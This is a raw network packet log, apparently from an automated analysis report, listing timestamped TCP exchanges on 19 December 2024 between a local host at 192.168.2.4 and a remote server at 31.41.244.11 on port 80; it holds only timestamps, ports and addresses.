                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.268738031 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.268949032 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.269174099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.269296885 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.269433022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.269484997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.269752026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.269829988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.270037889 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.270169973 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.270601034 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.270668030 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.270679951 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.270720959 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.271321058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.271393061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.271450043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.271619081 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.272100925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.272152901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.272315025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.272419930 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.272916079 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.272974968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.273056030 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.273130894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.273874044 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.273885012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.273927927 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.273953915 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.274584055 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.274657965 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.274718046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.274820089 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.275547028 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.275687933 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.275708914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.275764942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.276205063 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.276300907 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.276356936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.276422024 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.277004957 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.277018070 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.277074099 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.277534008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.277592897 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.277698040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.277817011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.282702923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.282819033 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.282915115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.283152103 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.283174038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.283335924 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.283386946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.283444881 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.283914089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.283982992 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.284008026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.284066916 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.286488056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.286501884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.286545992 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.289185047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.289199114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.289259911 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.289278030 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.291085958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.291100025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.291110992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.291182995 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.291182995 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.292006969 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.292126894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.295655966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.295675993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.295768976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.295768976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.300080061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.300092936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.300136089 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.300179958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.301189899 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.301250935 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.302016020 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.302072048 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.302089930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.302098989 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.302109003 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.302134037 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.302211046 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.303093910 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.303114891 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.303127050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.303152084 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.303246975 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.303978920 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.303993940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.304007053 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.304069042 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.304069042 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.304883003 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.304899931 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.304912090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.304980993 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.305028915 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.305547953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.305567026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.305617094 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.305629015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.306159973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.306241035 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.306265116 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.306370020 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.307847977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.307954073 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.308007002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.308151960 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.309031010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.309106112 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.309226990 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.309400082 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.343653917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.343787909 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.343815088 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.343827009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.343878984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.344268084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.344419956 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.344667912 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.344680071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.344784021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.345134974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.345211983 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.345520973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.345532894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.345614910 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.345951080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.346026897 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.346204042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.346215010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.346286058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.346996069 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.347105980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.347163916 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.347176075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.347244024 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.348077059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.348088980 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.348114014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.348192930 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.348193884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.348969936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.349102020 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.349128008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.349139929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.349255085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.349849939 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.349962950 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.350019932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.350032091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.350111961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.350111961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.350824118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.350898027 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.351011992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.351022959 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.351248980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.351895094 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.351963997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.352077961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.352088928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.352152109 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.352828026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.352938890 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.352958918 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.352977037 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.353018999 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.353072882 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.353786945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.353872061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.353899956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.353913069 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.354001045 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.354660988 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.354825974 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.354881048 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.354892969 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.355331898 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.355918884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.355932951 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.356307983 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.356518984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.356703997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.357273102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.357680082 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.358522892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.358536959 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.358741999 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.358916044 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.358927965 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.358939886 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.358999014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.358999014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.359755993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.359767914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.359778881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.359828949 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.359863997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.360596895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.360608101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.360620022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.360656977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.360697031 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.361435890 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.361447096 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.361459017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.361531973 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.361531973 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.362524033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.362621069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.362782955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.362838030 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.363698006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.363827944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.363907099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.363919973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.363979101 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.364451885 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.364635944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.364713907 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.364725113 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.364774942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.365268946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.365323067 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.365680933 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.365691900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.365812063 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.500248909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.500412941 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.500442982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.500457048 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.500521898 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.500521898 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.500792980 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501004934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501018047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501034975 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501066923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501066923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501506090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501518011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501558065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501740932 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501893997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501905918 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501919985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501976967 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.501976967 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.502518892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.502590895 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.503592968 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.503654957 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.504313946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.504326105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.504337072 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.504407883 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.504407883 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.505970955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.506237030 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.506566048 CET804974331.41.244.11192.168.2.4
